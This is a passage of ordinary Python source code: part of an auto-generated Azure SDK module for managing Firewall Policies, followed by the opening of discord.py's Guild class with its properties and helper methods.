pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
parameters, # type: "_models.FirewallPolicy"
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallPolicy"
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'FirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
parameters, # type: "_models.FirewallPolicy"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.FirewallPolicy"]
"""Creates or updates the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:param parameters: Parameters supplied to the create or update Firewall Policy operation.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.FirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either FirewallPolicy or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_06_01.models.FirewallPolicy]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
firewall_policy_name=firewall_policy_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FirewallPolicyListResult"]
"""Lists all Firewall Policies in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_06_01.models.FirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FirewallPolicyListResult"]
"""Gets all the Firewall Policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_06_01.models.FirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/firewallPolicies'} # type: ignore
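    # A minimal usage sketch (assumes azure-identity is installed and the
    # environment is configured for DefaultAzureCredential; the subscription id
    # below is a placeholder):
    #
    #   from azure.identity import DefaultAzureCredential
    #   from azure.mgmt.network import NetworkManagementClient
    #
    #   client = NetworkManagementClient(DefaultAzureCredential(), '<subscription-id>')
    #   for policy in client.firewall_policies.list_all():
    #       print(policy.name)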
|
py | 1a38aa6f03bbc047f3bbde85d943c99261cebc7b | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from collections import namedtuple
from typing import List, TYPE_CHECKING
from . import utils, abc
from .role import Role
from .member import Member, VoiceState
from .emoji import Emoji
from .errors import InvalidData
from .permissions import PermissionOverwrite
from .colour import Colour
from .errors import InvalidArgument, ClientException
from .channel import *
from .enums import VoiceRegion, ChannelType, try_enum, VerificationLevel, ContentFilter, NotificationLevel
from .mixins import Hashable
from .user import User
from .invite import Invite
from .iterators import AuditLogIterator, MemberIterator
from .widget import Widget
from .asset import Asset
from .flags import SystemChannelFlags
from .integrations import Integration
__all__ = (
'Guild',
)
if TYPE_CHECKING:
from .types.guild import (
Ban as BanPayload
)
BanEntry = namedtuple('BanEntry', 'reason user')
_GuildLimit = namedtuple('_GuildLimit', 'emoji bitrate filesize')
class Guild(Hashable):
"""Represents a Discord guild.
This is referred to as a "server" in the official Discord UI.
.. container:: operations
.. describe:: x == y
Checks if two guilds are equal.
.. describe:: x != y
Checks if two guilds are not equal.
.. describe:: hash(x)
Returns the guild's hash.
.. describe:: str(x)
Returns the guild's name.
Attributes
----------
name: :class:`str`
The guild name.
emojis: Tuple[:class:`Emoji`, ...]
All emojis that the guild owns.
region: :class:`VoiceRegion`
The region the guild belongs on. There is a chance that the region
will be a :class:`str` if the value is not recognised by the enumerator.
afk_timeout: :class:`int`
The timeout to get sent to the AFK channel.
afk_channel: Optional[:class:`VoiceChannel`]
The channel that denotes the AFK channel. ``None`` if it doesn't exist.
icon: Optional[:class:`str`]
The guild's icon.
id: :class:`int`
The guild's ID.
owner_id: :class:`int`
The guild owner's ID. Use :attr:`Guild.owner` instead.
unavailable: :class:`bool`
Indicates if the guild is unavailable. If this is ``True`` then the
reliability of other attributes outside of :meth:`Guild.id` is slim and they might
all be ``None``. It is best to not do anything with the guild if it is unavailable.
Check the :func:`on_guild_unavailable` and :func:`on_guild_available` events.
max_presences: Optional[:class:`int`]
The maximum amount of presences for the guild.
max_members: Optional[:class:`int`]
The maximum amount of members for the guild.
.. note::
This attribute is only available via :meth:`.Client.fetch_guild`.
max_video_channel_users: Optional[:class:`int`]
The maximum amount of users in a video channel.
.. versionadded:: 1.4
banner: Optional[:class:`str`]
The guild's banner.
description: Optional[:class:`str`]
The guild's description.
mfa_level: :class:`int`
Indicates the guild's two factor authorisation level. If this value is 0 then
the guild does not require 2FA for their administrative members. If the value is
1 then they do.
verification_level: :class:`VerificationLevel`
The guild's verification level.
explicit_content_filter: :class:`ContentFilter`
The guild's explicit content filter.
default_notifications: :class:`NotificationLevel`
The guild's notification settings.
features: List[:class:`str`]
A list of features that the guild has. They are currently as follows:
- ``VIP_REGIONS``: Guild has VIP voice regions
- ``VANITY_URL``: Guild can have a vanity invite URL (e.g. discord.gg/discord-api)
- ``INVITE_SPLASH``: Guild's invite page can have a special splash.
- ``VERIFIED``: Guild is a verified server.
- ``PARTNERED``: Guild is a partnered server.
- ``MORE_EMOJI``: Guild is allowed to have more than 50 custom emoji.
- ``DISCOVERABLE``: Guild shows up in Server Discovery.
- ``FEATURABLE``: Guild is able to be featured in Server Discovery.
- ``COMMUNITY``: Guild is a community server.
- ``COMMERCE``: Guild can sell things using store channels.
- ``PUBLIC``: Guild is a public guild.
- ``NEWS``: Guild can create news channels.
- ``BANNER``: Guild can upload and use a banner (i.e. :meth:`banner_url`).
- ``ANIMATED_ICON``: Guild can upload an animated icon.
- ``PUBLIC_DISABLED``: Guild cannot be public.
- ``WELCOME_SCREEN_ENABLED``: Guild has enabled the welcome screen
- ``MEMBER_VERIFICATION_GATE_ENABLED``: Guild has Membership Screening enabled.
- ``PREVIEW_ENABLED``: Guild can be viewed before being accepted via Membership Screening.
splash: Optional[:class:`str`]
The guild's invite splash.
premium_tier: :class:`int`
The premium tier for this guild. Corresponds to "Nitro Server" in the official UI.
The number goes from 0 to 3 inclusive.
premium_subscription_count: :class:`int`
The number of "boosts" this guild currently has.
preferred_locale: Optional[:class:`str`]
The preferred locale for the guild. Used when filtering Server Discovery
results to a specific language.
discovery_splash: :class:`str`
The guild's discovery splash.
.. versionadded:: 1.3
"""
__slots__ = ('afk_timeout', 'afk_channel', '_members', '_channels', 'icon',
'name', 'id', 'unavailable', 'banner', 'region', '_state',
'_roles', '_member_count', '_large',
'owner_id', 'mfa_level', 'emojis', 'features',
'verification_level', 'explicit_content_filter', 'splash',
'_voice_states', '_system_channel_id', 'default_notifications',
'description', 'max_presences', 'max_members', 'max_video_channel_users',
'premium_tier', 'premium_subscription_count', '_system_channel_flags',
'preferred_locale', 'discovery_splash', '_rules_channel_id',
'_public_updates_channel_id')
_PREMIUM_GUILD_LIMITS = {
None: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
0: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
1: _GuildLimit(emoji=100, bitrate=128e3, filesize=8388608),
2: _GuildLimit(emoji=150, bitrate=256e3, filesize=52428800),
3: _GuildLimit(emoji=250, bitrate=384e3, filesize=104857600),
}
def __init__(self, *, data, state):
self._channels = {}
self._members = {}
self._voice_states = {}
self._state = state
self._from_data(data)
def _add_channel(self, channel):
self._channels[channel.id] = channel
def _remove_channel(self, channel):
self._channels.pop(channel.id, None)
def _voice_state_for(self, user_id):
return self._voice_states.get(user_id)
def _add_member(self, member):
self._members[member.id] = member
def _remove_member(self, member):
self._members.pop(member.id, None)
def __str__(self):
return self.name or ''
def __repr__(self):
attrs = (
('id', self.id),
('name', self.name),
('shard_id', self.shard_id),
('chunked', self.chunked),
('member_count', getattr(self, '_member_count', None)),
)
inner = ' '.join('%s=%r' % t for t in attrs)
return f'<Guild {inner}>'
def _update_voice_state(self, data, channel_id):
user_id = int(data['user_id'])
channel = self.get_channel(channel_id)
try:
# check if we should remove the voice state from cache
if channel is None:
after = self._voice_states.pop(user_id)
else:
after = self._voice_states[user_id]
before = copy.copy(after)
after._update(data, channel)
except KeyError:
# if we're here then we're getting added into the cache
after = VoiceState(data=data, channel=channel)
before = VoiceState(data=data, channel=None)
self._voice_states[user_id] = after
member = self.get_member(user_id)
if member is None:
try:
member = Member(data=data['member'], state=self._state, guild=self)
except KeyError:
member = None
return member, before, after
def _add_role(self, role):
# roles get added to the bottom (position 1, pos 0 is @everyone)
# so since self.roles has the @everyone role, we can't increment
# its position because it's stuck at position 0. Luckily x += False
# is equivalent to adding 0. So we cast the position to a bool and
# increment it.
for r in self._roles.values():
r.position += (not r.is_default())
self._roles[role.id] = role
def _remove_role(self, role_id):
# this raises KeyError if it fails..
role = self._roles.pop(role_id)
# since it didn't, we can change the positions now
# basically the same as above except we only decrement
# the position if we're above the role we deleted.
for r in self._roles.values():
r.position -= r.position > role.position
return role
def _from_data(self, guild):
# according to Stan, this is always available even if the guild is unavailable
# I don't have this guarantee when someone updates the guild.
member_count = guild.get('member_count', None)
if member_count is not None:
self._member_count = member_count
self.name = guild.get('name')
self.region = try_enum(VoiceRegion, guild.get('region'))
self.verification_level = try_enum(VerificationLevel, guild.get('verification_level'))
self.default_notifications = try_enum(NotificationLevel, guild.get('default_message_notifications'))
self.explicit_content_filter = try_enum(ContentFilter, guild.get('explicit_content_filter', 0))
self.afk_timeout = guild.get('afk_timeout')
self.icon = guild.get('icon')
self.banner = guild.get('banner')
self.unavailable = guild.get('unavailable', False)
self.id = int(guild['id'])
self._roles = {}
state = self._state # speed up attribute access
for r in guild.get('roles', []):
role = Role(guild=self, data=r, state=state)
self._roles[role.id] = role
self.mfa_level = guild.get('mfa_level')
self.emojis = tuple(map(lambda d: state.store_emoji(self, d), guild.get('emojis', [])))
self.features = guild.get('features', [])
self.splash = guild.get('splash')
self._system_channel_id = utils._get_as_snowflake(guild, 'system_channel_id')
self.description = guild.get('description')
self.max_presences = guild.get('max_presences')
self.max_members = guild.get('max_members')
self.max_video_channel_users = guild.get('max_video_channel_users')
self.premium_tier = guild.get('premium_tier', 0)
self.premium_subscription_count = guild.get('premium_subscription_count') or 0
self._system_channel_flags = guild.get('system_channel_flags', 0)
self.preferred_locale = guild.get('preferred_locale')
self.discovery_splash = guild.get('discovery_splash')
self._rules_channel_id = utils._get_as_snowflake(guild, 'rules_channel_id')
self._public_updates_channel_id = utils._get_as_snowflake(guild, 'public_updates_channel_id')
cache_joined = self._state.member_cache_flags.joined
self_id = self._state.self_id
for mdata in guild.get('members', []):
member = Member(data=mdata, guild=self, state=state)
if cache_joined or member.id == self_id:
self._add_member(member)
self._sync(guild)
self._large = None if member_count is None else self._member_count >= 250
self.owner_id = utils._get_as_snowflake(guild, 'owner_id')
self.afk_channel = self.get_channel(utils._get_as_snowflake(guild, 'afk_channel_id'))
for obj in guild.get('voice_states', []):
self._update_voice_state(obj, int(obj['channel_id']))
def _sync(self, data):
try:
self._large = data['large']
except KeyError:
pass
empty_tuple = tuple()
for presence in data.get('presences', []):
user_id = int(presence['user']['id'])
member = self.get_member(user_id)
if member is not None:
member._presence_update(presence, empty_tuple)
if 'channels' in data:
channels = data['channels']
for c in channels:
factory, ch_type = _channel_factory(c['type'])
if factory:
self._add_channel(factory(guild=self, data=c, state=self._state))
@property
def channels(self):
"""List[:class:`abc.GuildChannel`]: A list of channels that belongs to this guild."""
return list(self._channels.values())
@property
def large(self):
""":class:`bool`: Indicates if the guild is a 'large' guild.
A large guild is defined as one with more than ``large_threshold``
members, which for this library is set to the maximum of 250.
"""
if self._large is None:
try:
return self._member_count >= 250
except AttributeError:
return len(self._members) >= 250
return self._large
@property
def voice_channels(self):
"""List[:class:`VoiceChannel`]: A list of voice channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, VoiceChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def stage_channels(self):
"""List[:class:`StageChannel`]: A list of voice channels that belongs to this guild.
.. versionadded:: 1.7
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, StageChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def me(self):
""":class:`Member`: Similar to :attr:`Client.user` except an instance of :class:`Member`.
This is essentially used to get the member version of yourself.
"""
self_id = self._state.user.id
return self.get_member(self_id)
@property
def voice_client(self):
"""Optional[:class:`VoiceProtocol`]: Returns the :class:`VoiceProtocol` associated with this guild, if any."""
return self._state._get_voice_client(self.id)
@property
def text_channels(self):
"""List[:class:`TextChannel`]: A list of text channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, TextChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def categories(self):
"""List[:class:`CategoryChannel`]: A list of categories that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, CategoryChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
def by_category(self):
"""Returns every :class:`CategoryChannel` and their associated channels.
These channels and categories are sorted in the official Discord UI order.
If the channels do not have a category, then the first element of the tuple is
``None``.
Returns
--------
List[Tuple[Optional[:class:`CategoryChannel`], List[:class:`abc.GuildChannel`]]]:
The categories and their associated channels.
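Example
--------
A minimal usage sketch (``guild`` is assumed to be any cached :class:`Guild`): ::
    for category, channels in guild.by_category():
        label = category.name if category else 'No Category'
        print(label, [channel.name for channel in channels])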
"""
grouped = {}
for channel in self._channels.values():
if isinstance(channel, CategoryChannel):
grouped.setdefault(channel.id, [])
continue
try:
grouped[channel.category_id].append(channel)
except KeyError:
grouped[channel.category_id] = [channel]
def key(t):
k, v = t
return ((k.position, k.id) if k else (-1, -1), v)
_get = self._channels.get
as_list = [(_get(k), v) for k, v in grouped.items()]
as_list.sort(key=key)
for _, channels in as_list:
channels.sort(key=lambda c: (c._sorting_bucket, c.position, c.id))
return as_list
def get_channel(self, channel_id):
"""Returns a channel with the given ID.
Parameters
-----------
channel_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`.abc.GuildChannel`]
The returned channel or ``None`` if not found.
"""
return self._channels.get(channel_id)
@property
def system_channel(self):
"""Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages.
If no channel is set, then this returns ``None``.
"""
channel_id = self._system_channel_id
return channel_id and self._channels.get(channel_id)
@property
def system_channel_flags(self):
""":class:`SystemChannelFlags`: Returns the guild's system channel settings."""
return SystemChannelFlags._from_value(self._system_channel_flags)
@property
def rules_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel used for the rules.
The guild must be a Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.3
"""
channel_id = self._rules_channel_id
return channel_id and self._channels.get(channel_id)
@property
def public_updates_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel where admins and
moderators of the guilds receive notices from Discord. The guild must be a
Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.4
"""
channel_id = self._public_updates_channel_id
return channel_id and self._channels.get(channel_id)
@property
def emoji_limit(self):
""":class:`int`: The maximum number of emoji slots this guild has."""
more_emoji = 200 if 'MORE_EMOJI' in self.features else 50
return max(more_emoji, self._PREMIUM_GUILD_LIMITS[self.premium_tier].emoji)
@property
def bitrate_limit(self):
""":class:`float`: The maximum bitrate for voice channels this guild can have."""
vip_guild = self._PREMIUM_GUILD_LIMITS[1].bitrate if 'VIP_REGIONS' in self.features else 96e3
return max(vip_guild, self._PREMIUM_GUILD_LIMITS[self.premium_tier].bitrate)
@property
def filesize_limit(self):
""":class:`int`: The maximum number of bytes files can have when uploaded to this guild."""
return self._PREMIUM_GUILD_LIMITS[self.premium_tier].filesize
@property
def members(self):
"""List[:class:`Member`]: A list of members that belong to this guild."""
return list(self._members.values())
def get_member(self, user_id):
"""Returns a member with the given ID.
Parameters
-----------
user_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Member`]
The member or ``None`` if not found.
"""
return self._members.get(user_id)
@property
def premium_subscribers(self):
"""List[:class:`Member`]: A list of members who have "boosted" this guild."""
return [member for member in self.members if member.premium_since is not None]
@property
def roles(self):
"""List[:class:`Role`]: Returns a :class:`list` of the guild's roles in hierarchy order.
The first element of this list will be the lowest role in the
hierarchy.
"""
return sorted(self._roles.values())
def get_role(self, role_id):
"""Returns a role with the given ID.
Parameters
-----------
role_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Role`]
The role or ``None`` if not found.
"""
return self._roles.get(role_id)
@property
def default_role(self):
""":class:`Role`: Gets the @everyone role that all members have by default."""
return self.get_role(self.id)
@property
def premium_subscriber_role(self):
"""Optional[:class:`Role`]: Gets the premium subscriber role, AKA "boost" role, in this guild.
.. versionadded:: 1.6
"""
for role in self._roles.values():
if role.is_premium_subscriber():
return role
return None
@property
def self_role(self):
"""Optional[:class:`Role`]: Gets the role associated with this client's user, if any.
.. versionadded:: 1.6
"""
self_id = self._state.self_id
for role in self._roles.values():
tags = role.tags
if tags and tags.bot_id == self_id:
return role
return None
@property
def owner(self):
"""Optional[:class:`Member`]: The member that owns the guild."""
return self.get_member(self.owner_id)
@property
def icon_url(self):
""":class:`Asset`: Returns the guild's icon asset."""
return self.icon_url_as()
def is_icon_animated(self):
""":class:`bool`: Returns True if the guild has an animated icon."""
return bool(self.icon and self.icon.startswith('a_'))
def icon_url_as(self, *, format=None, static_format='webp', size=1024):
"""Returns an :class:`Asset` for the guild's icon.
The format must be one of 'webp', 'jpeg', 'jpg', 'png' or 'gif', and
'gif' is only valid for animated icons. The size must be a power of 2
between 16 and 4096.
Parameters
-----------
format: Optional[:class:`str`]
The format to attempt to convert the icon to.
If the format is ``None``, then it is automatically
detected into either 'gif' or static_format depending on the
icon being animated or not.
static_format: Optional[:class:`str`]
Format to attempt to convert only non-animated icons to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
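Example
--------
A usage sketch; the format and size values are illustrative: ::
    url = guild.icon_url_as(format='png', size=256)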
"""
return Asset._from_guild_icon(self._state, self, format=format, static_format=static_format, size=size)
@property
def banner_url(self):
""":class:`Asset`: Returns the guild's banner asset."""
return self.banner_url_as()
def banner_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's banner.
The format must be one of 'webp', 'jpeg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the banner to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.banner, 'banners', format=format, size=size)
@property
def splash_url(self):
""":class:`Asset`: Returns the guild's invite splash asset."""
return self.splash_url_as()
def splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's invite splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.splash, 'splashes', format=format, size=size)
@property
def discovery_splash_url(self):
""":class:`Asset`: Returns the guild's discovery splash asset.
.. versionadded:: 1.3
"""
return self.discovery_splash_url_as()
def discovery_splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's discovery splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
.. versionadded:: 1.3
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.discovery_splash, 'discovery-splashes', format=format, size=size)
@property
def member_count(self):
""":class:`int`: Returns the true member count regardless of it being loaded fully or not.
.. warning::
Due to a Discord limitation, in order for this attribute to remain up-to-date and
accurate, it requires :attr:`Intents.members` to be specified.
"""
return self._member_count
@property
def chunked(self):
""":class:`bool`: Returns a boolean indicating if the guild is "chunked".
A chunked guild means that :attr:`member_count` is equal to the
number of members stored in the internal :attr:`members` cache.
If this value returns ``False``, then you should request for
offline members.
"""
count = getattr(self, '_member_count', None)
if count is None:
return False
return count == len(self._members)
@property
def shard_id(self):
""":class:`int`: Returns the shard ID for this guild if applicable."""
count = self._state.shard_count
if count is None:
return None
return (self.id >> 22) % count
@property
def created_at(self):
""":class:`datetime.datetime`: Returns the guild's creation time in UTC."""
return utils.snowflake_time(self.id)
def get_member_named(self, name):
"""Returns the first member found that matches the name provided.
The name can have an optional discriminator argument, e.g. "Jake#0001"
or "Jake" will both do the lookup. However the former will give a more
precise result. Note that the discriminator must have all 4 digits
for this to work.
If a nickname is passed, then it is looked up via the nickname. Note
however, that a nickname + discriminator combo will not lookup the nickname
but rather the username + discriminator combo due to nickname + discriminator
not being unique.
If no member is found, ``None`` is returned.
Parameters
-----------
name: :class:`str`
The name of the member to lookup with an optional discriminator.
